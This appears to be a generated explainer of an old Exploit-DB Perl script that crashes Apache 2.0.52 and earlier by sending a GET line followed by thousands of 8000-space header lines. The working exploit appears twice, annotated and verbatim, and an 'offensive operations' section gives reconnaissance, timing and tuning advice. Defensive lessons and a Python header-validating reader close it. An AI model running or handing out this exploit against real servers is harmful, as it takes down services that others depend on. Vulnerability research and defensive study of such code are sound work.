Apache 2.0.52 GET Denial of Service Exploit Explained

What this paper is
This paper is an exploit script written in Perl that targets a vulnerability in Apache web servers, specifically versions up to and including 2.0.52. The vulnerability allows an attacker to cause a Denial of Service (DoS) by sending a specially crafted HTTP GET request. The script aims to exhaust the server's resources, making it unresponsive to legitimate user requests.
Simple technical breakdown
The exploit opens a TCP connection to port 80 and sends an ordinary request line, GET / HTTP/1.0, but never follows it with the blank line that terminates an HTTP header block. Instead it repeatedly sends a line of 8000 spaces followed by a newline, so the server keeps reading these lines as part of the request's headers. Processing this excessive, malformed header data exhausts the server's resources and produces the DoS condition. The script lets the user specify how many times the space-filled line is sent.
Complete code and payload walkthrough
The provided Perl script is designed to exploit a DoS vulnerability in Apache versions up to 2.0.52. Let's break down the code and its functionality.
#!/usr/bin/perl
# Based on ->
# apache-squ1rt.c exploit.
#
# Original credit goes to Chintan Trivedi on the
# FullDisclosure mailing list:
# http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
# Added future with we can exploit Apache web servers on windows system. For it you should experiment
# with [trys] parameter of this code.
#
# By default parameter trys = 8000, for DoS Apache web servers on windows system try to
# increase this parameter.
#
# For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
# C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
# <+> Prepare to start connect.
# <+> Connected to 127.0.0.1
# <+> Send of first part of devil header.
# <+> Prepare to DoS with 10000 trys.
# <+> Start DoS second part of devil header.
# <SOD> |====================> <EOD>
# <+> Ok now target web server maybe DoSeD.
#
#
# Note ->
#
# If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
# And if you see "Eror 500" you are lucky man :)
#
# Warnings ->
# This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or
# use it for attack, or others things.
#
# Shit ->
# My English now is bulls shit :( I try study it :)
#
# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)
# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.
# Contact to me at greenwood3[AT]yandex[dot]ru
use IO::Socket; # Imports the module for network socket operations.
if (@ARGV <1) # Checks if fewer than one command-line argument is provided.
{
print "\n ::: ---------------------------------------------- :::\n";
print " ::: Another yet DoS exploit for Apache <= 2.0.52 :::\n";
print " ::: Usage: ap2.0.52_dos.pl <ip> [trys] :::\n"; # Prints usage instructions.
print " ::: Coded by GreenwooD from Network Security Team :::\n";
print " ::: ---------------------------------------------- :::\n";
exit(); # Exits the script if arguments are insufficient.
}
print "\n <+> Prepare to start connect.\n"; # Informative message.
$s = IO::Socket::INET->new(Proto=>"tcp", # Creates a new TCP socket.
PeerAddr=>$ARGV[0], # Sets the target IP address from the first argument.
PeerPort=>80, # Sets the target port to 80 (HTTP).
Timeout=>6 # Sets a timeout for the connection attempt.
) or die " <-> Target web server already DoSeD ??? or can't connect :(\n"; # Error handling if connection fails.
$s->autoflush(); # Ensures data is sent immediately without buffering.
print " <+> Connected to $ARGV[0]\n"; # Confirms successful connection.
print " <+> Send of first part of devil header.\n"; # Informative message.
print $s "GET / HTTP/1.0\n"; # Sends a basic HTTP GET request. This is the initial "normal" request.
$trys = 8000; # Default value for the number of times the malicious payload will be sent.
if ($ARGV[1]) # Checks if a second command-line argument (number of tries) is provided.
{
$trys = $ARGV[1]; # If provided, sets $trys to the value of the second argument.
}
print " <+> Prepare to DoS with $trys trys.\n"; # Informs about the number of iterations.
print " <+> Start DoS send second part of devil header.\n"; # Informative message.
print " <SOD> |"; # Marks the start of the progress indicator.
$i=0; # Initializes a counter for the loop.
do { # Starts a do-while loop.
print $s (" " x 8000 . "\n"); # Sends a string of 8000 spaces followed by a newline character to the server. This is the core of the DoS payload.
if ($i % 500 == 0) # Checks if the current iteration is a multiple of 500.
{
print "="; # Prints an equals sign to show progress.
}
++$i; # Increments the counter.
} until ($i == $trys); # The loop continues until the counter reaches the specified number of tries.
print "> <EOD>\n"; # Marks the end of the progress indicator.
close($s); # Closes the socket connection.
print " <+> Ok now target web server maybe DoSeD.\n"; # Final message indicating potential DoS.
# milw0rm.com [2005-03-04]
Code Fragment/Block -> Practical Purpose Mapping:
- #!/usr/bin/perl -> Shebang line; indicates the script should be executed with the Perl interpreter.
- Comments (# ...) -> Provide context, credit, information about the vulnerability (CVE-2004-0942), usage examples, and warnings.
- use IO::Socket; -> Imports the necessary Perl module for creating and managing network sockets.
- if (@ARGV <1) block -> Handles command-line arguments. If no IP address is provided, it prints usage instructions and exits.
- print "\n <+> Prepare to start connect.\n"; -> User-facing output indicating the script's intent.
- $s = IO::Socket::INET->new(...) -> Establishes a TCP connection to the target IP address on port 80.
  - Proto=>"tcp" -> Specifies the TCP protocol.
  - PeerAddr=>$ARGV[0] -> Sets the destination IP address from the first command-line argument.
  - PeerPort=>80 -> Sets the destination port to the standard HTTP port.
  - Timeout=>6 -> Sets a 6-second timeout for the connection attempt.
  - or die " <-> Target web server already DoSeD ??? or can't connect :(\n"; -> Error handling if the socket creation fails.
- $s->autoflush(); -> Ensures that data sent through the socket is immediately transmitted, not buffered.
- print " <+> Connected to $ARGV[0]\n"; -> Confirms a successful connection to the target.
- print $s "GET / HTTP/1.0\n"; -> Sends a basic HTTP GET request. This is the initial, seemingly legitimate request.
- $trys = 8000; -> Initializes a variable $trys with a default value of 8000. This variable determines how many times the malicious payload will be sent.
- if ($ARGV[1]) { $trys = $ARGV[1]; } -> Checks if a second command-line argument is provided. If so, it overrides the default $trys value with the user-provided number.
- do { ... } until ($i == $trys); -> This is the core loop of the exploit.
  - print $s (" " x 8000 . "\n"); -> This is the malicious payload. It sends a string consisting of 8000 space characters followed by a newline character over the established socket. This is repeated $trys times.
  - if ($i % 500 == 0) { print "="; } -> Provides a visual progress indicator by printing an equals sign every 500 iterations.
  - ++$i; -> Increments the loop counter.
- print "> <EOD>\n"; -> Marks the end of the progress indicator.
- close($s); -> Closes the network connection to the target.
- print " <+> Ok now target web server maybe DoSeD.\n"; -> Final output indicating the exploit has completed and the target might be in a DoS state.
Shellcode/Payload Segments:
There is no traditional shellcode in this exploit. The "payload" is the sequence of network packets sent to the server.
- Stage 1: Initial Connection and HTTP GET Request:
- Purpose: To establish a connection to the target Apache server and send a standard HTTP GET request. This is often done to ensure the server is alive and listening, and to initiate a request that the server will try to process.
- Mechanism: IO::Socket::INET->new(...) and print $s "GET / HTTP/1.0\n";.
- Stage 2: Repeated Malicious Data Injection:
- Purpose: To overwhelm the server's resources by sending a large volume of malformed data. The vulnerability likely lies in how Apache handles excessively long header lines or malformed requests, leading to resource exhaustion (e.g., memory leaks, excessive CPU usage, thread/process blocking).
- Mechanism: The do { ... } until ($i == $trys); loop, specifically the print $s (" " x 8000 . "\n"); line. This sends 8000 spaces followed by a newline, repeated $trys times.
Practical details for offensive operations teams
- Required Access Level: Network access to the target IP address and port 80 (HTTP). No local system access is required on the target.
- Lab Preconditions:
- A controlled lab environment with a vulnerable Apache version (2.0.52 or earlier) running on a test system.
- Network connectivity between the attacker machine and the target.
- A Perl interpreter installed on the attacker machine.
- Tooling Assumptions:
- Perl interpreter.
- Basic network connectivity tools (e.g., ping to check reachability).
- Execution Pitfalls:
- Firewalls: Network firewalls might block outbound connections to port 80 or inbound responses if the server attempts to reply.
- Intrusion Detection/Prevention Systems (IDS/IPS): Signature-based IDS/IPS might detect the unusual pattern of repeated large space strings as malicious.
- Server Configuration: Modern Apache configurations or server hardening might mitigate this specific vulnerability. The exploit relies on older, less robust handling of malformed HTTP requests.
- Resource Exhaustion: The exploit might not cause a complete DoS if the server has ample resources or if the number of trys is too low. Conversely, an excessively high trys value could consume significant bandwidth and processing power on the attacker's machine.
- Target Unresponsiveness: If the target is already down or unreachable, the script will report a connection error.
- Windows Specifics: The author notes experimentation is needed for Windows. The default trys value (8000) might be insufficient, and increasing it (e.g., to 30000 as in the example) might be necessary. This suggests Windows Apache instances might have different resource management or buffering characteristics.
- Tradecraft Considerations:
- Reconnaissance: Confirm the Apache version and OS of the target during reconnaissance. Tools like whatweb or manual HTTP header analysis can help.
- Stealth: This exploit is noisy. The large volume of traffic and the nature of the payload are easily detectable. It's unlikely to be used in a stealthy operation.
- Impact Assessment: Understand that this is a DoS attack. Its primary goal is to disrupt service, not gain access.
- Timing: Execute during periods of low legitimate traffic if possible, though the goal is to disrupt service regardless.
- Payload Customization: The trys parameter is the primary customization. Experimentation is key, especially for different operating systems or server configurations.
- Likely Failure Points:
- Server not running Apache or a vulnerable version.
- Network connectivity issues.
- Firewall blocking traffic.
- IDS/IPS detection and blocking.
- Server's ability to handle the malformed requests without crashing or becoming unresponsive (e.g., due to robust error handling or resource limits).
- Incorrect target IP or port.
Where this was used and when
- Discovery/Publication: The exploit was published on March 4, 2005, by GreenwooD.
- Vulnerability Context: It targets a vulnerability (CVE-2004-0942) that was known and discussed in late 2004. The original credit for the exploit concept is given to Chintan Trivedi on the FullDisclosure mailing list in November 2004.
- Usage Context: This type of exploit would have been used in the mid-2000s by individuals or groups looking to disrupt web services. It's a classic example of a resource exhaustion DoS attack against a widely used web server. It's unlikely to be effective against modern, patched Apache installations.
Defensive lessons for modern teams
- Patch Management: Keep web server software (Apache, Nginx, etc.) and operating systems up-to-date with the latest security patches. This vulnerability is addressed in later Apache versions.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block malformed HTTP requests, excessively long headers, or unusual traffic patterns.
- Network Intrusion Detection/Prevention Systems (IDS/IPS): Ensure IDS/IPS signatures are updated to detect known DoS attack patterns, including those involving malformed HTTP requests.
- Server Resource Monitoring: Implement robust monitoring for CPU, memory, and network usage on web servers. Sudden spikes can indicate an ongoing attack.
- Rate Limiting: Configure web servers or network devices to limit the rate of incoming requests from individual IP addresses or to specific resources.
- HTTP Request Validation: Implement strict validation of incoming HTTP requests at the server level, rejecting requests that do not conform to RFC standards or that contain excessively large or malformed fields.
- Logging and Alerting: Ensure comprehensive logging of web server activity and set up alerts for suspicious events, such as a high volume of errors (like HTTP 500 errors mentioned in the exploit notes) or connection attempts.
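One way to apply the request-validation lesson above, written as an added example (not the paper's code and not Apache's own implementation): a bounded HTTP header reader that refuses the whitespace-only and over-long header lines this exploit sends before buffering them, and also handles a peer that closes mid-header or sends a folded line. The limits, function names and sample requests are constructed for the demo.

```python
import io
# Limits below are constructed for this demo (assumed values), not Apache's own defaults.
MAX_LINE_BYTES = 8190      # longest single request or header line accepted
MAX_HEADER_LINES = 100     # most header lines accepted per request


class BadRequest(Exception):
    """Raised as soon as a limit is violated; the caller then closes the connection."""


def read_request_head(stream):
    """Read the request line and headers up to the blank line, enforcing the limits.
    Returns (request_line, [(name, value), ...]) or raises BadRequest."""
    headers, request_line = [], None
    while True:
        # readline(limit) returns at most limit bytes, so an over-long line (or a peer
        # that closes before finishing the header block) shows up without a newline.
        line = stream.readline(MAX_LINE_BYTES + 1)
        if len(line) > MAX_LINE_BYTES or not line.endswith(b"\n"):
            raise BadRequest("line too long or connection closed mid-header")
        if request_line is None:
            request_line = line.rstrip(b"\r\n").decode("ascii")
            continue
        if line in (b"\r\n", b"\n"):        # blank line ends the header block
            return request_line, headers
        if not line.strip():                # the exploit's " " x 8000 . "\n" line
            raise BadRequest("whitespace-only header line")
        if len(headers) >= MAX_HEADER_LINES:
            raise BadRequest("too many header lines")
        name, sep, value = line.partition(b":")
        if not sep or not name or name != name.strip() or not name.isascii():
            raise BadRequest("malformed header field")
        headers.append((name.decode("ascii"), value.strip().decode("latin-1")))


def parse_head(raw):
    """Parse a request head held in memory; a socket's makefile('rb') behaves the same."""
    return read_request_head(io.BytesIO(raw))


def classify(raw):
    """Report 'ok' or the rejection reason for a captured request."""
    try:
        parse_head(raw)
        return "ok"
    except BadRequest as exc:
        return str(exc)


# Constructed samples: a normal request, the exploit's pattern, and an over-long header.
BENIGN = b"GET / HTTP/1.0\r\nHost: example.test\r\nUser-Agent: demo\r\n\r\n"
DOS_PATTERN = b"GET / HTTP/1.0\n" + (b" " * 8000 + b"\n") * 3
OVERLONG = b"GET / HTTP/1.0\r\nX-Big: " + b"a" * 9000 + b"\r\n\r\n"
```

The reader rejects the exploit's stream at its very first 8000-space line, so no amount of trys accumulates in the server's buffers.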
ASCII visual (if applicable)
This exploit's flow is primarily linear network communication. An ASCII visual can illustrate the connection and data flow.
+------------------+      +------------------+      +-------------------+
| Attacker Machine |----->| Network/Firewall |----->| Target Apache     |
| (Perl Script)    |      |                  |      | Server (2.0.52-)  |
+------------------+      +------------------+      +-------------------+
        |
        | 1. Establish TCP Connection (Port 80)
        | 2. Send "GET / HTTP/1.0\n"
        | 3. Repeatedly send " " * 8000 + "\n"
        |    (N times, where N = trys)
        | 4. Close Connection
        |
        V
  (Server attempts to process,
   leading to resource exhaustion)
Source references
- Paper URL: https://www.exploit-db.com/papers/855
- Original Exploit-DB Raw URL: https://www.exploit-db.com/raw/855
- Related CVE: CAN-2004-0942
- Original Discussion (FullDisclosure): http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl
# Based on ->
# apache-squ1rt.c exploit.
#
# Original credit goes to Chintan Trivedi on the
# FullDisclosure mailing list:
# http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
# Added future with we can exploit Apache web servers on windows system. For it you should experiment
# with [trys] parameter of this code.
#
# By default parameter trys = 8000, for DoS Apache web servers on windows system try to
# increase this parameter.
#
# For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
# C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
# <+> Prepare to start connect.
# <+> Connected to 127.0.0.1
# <+> Send of first part of devil header.
# <+> Prepare to DoS with 10000 trys.
# <+> Start DoS second part of devil header.
# <SOD> |====================> <EOD>
# <+> Ok now target web server maybe DoSeD.
#
#
# Note ->
#
# If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
# And if you see "Eror 500" you are lucky man :)
#
# Warnings ->
# This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or
# use it for attack, or others things.
#
# Shit ->
# My English now is bulls shit :( I try study it :)
#
# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)
# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.
# Contact to me at greenwood3[AT]yandex[dot]ru
use IO::Socket;
if (@ARGV <1)
{
print "\n ::: ---------------------------------------------- :::\n";
print " ::: Another yet DoS exploit for Apache <= 2.0.52 :::\n";
print " ::: Usage: ap2.0.52_dos.pl <ip> [trys] :::\n";
print " ::: Coded by GreenwooD from Network Security Team :::\n";
print " ::: ---------------------------------------------- :::\n";
exit();
}
print "\n <+> Prepare to start connect.\n";
$s = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>$ARGV[0],
PeerPort=>80,
Timeout=>6
) or die " <-> Target web server already DoSeD ??? or can't connect :(\n";
$s->autoflush();
print " <+> Connected to $ARGV[0]\n";
print " <+> Send of first part of devil header.\n";
print $s "GET / HTTP/1.0\n";
$trys = 8000; # Default
if ($ARGV[1])
{
$trys = $ARGV[1];
}
print " <+> Prepare to DoS with $trys trys.\n";
print " <+> Start DoS send second part of devil header.\n";
print " <SOD> |";
$i=0;
do {
print $s (" " x 8000 . "\n");
if ($i % 500 == 0)
{
print "=";
}
++$i;
} until ($i == $trys);
print "> <EOD>\n";
close($s);
print " <+> Ok now target web server maybe DoSeD.\n";
# milw0rm.com [2005-03-04]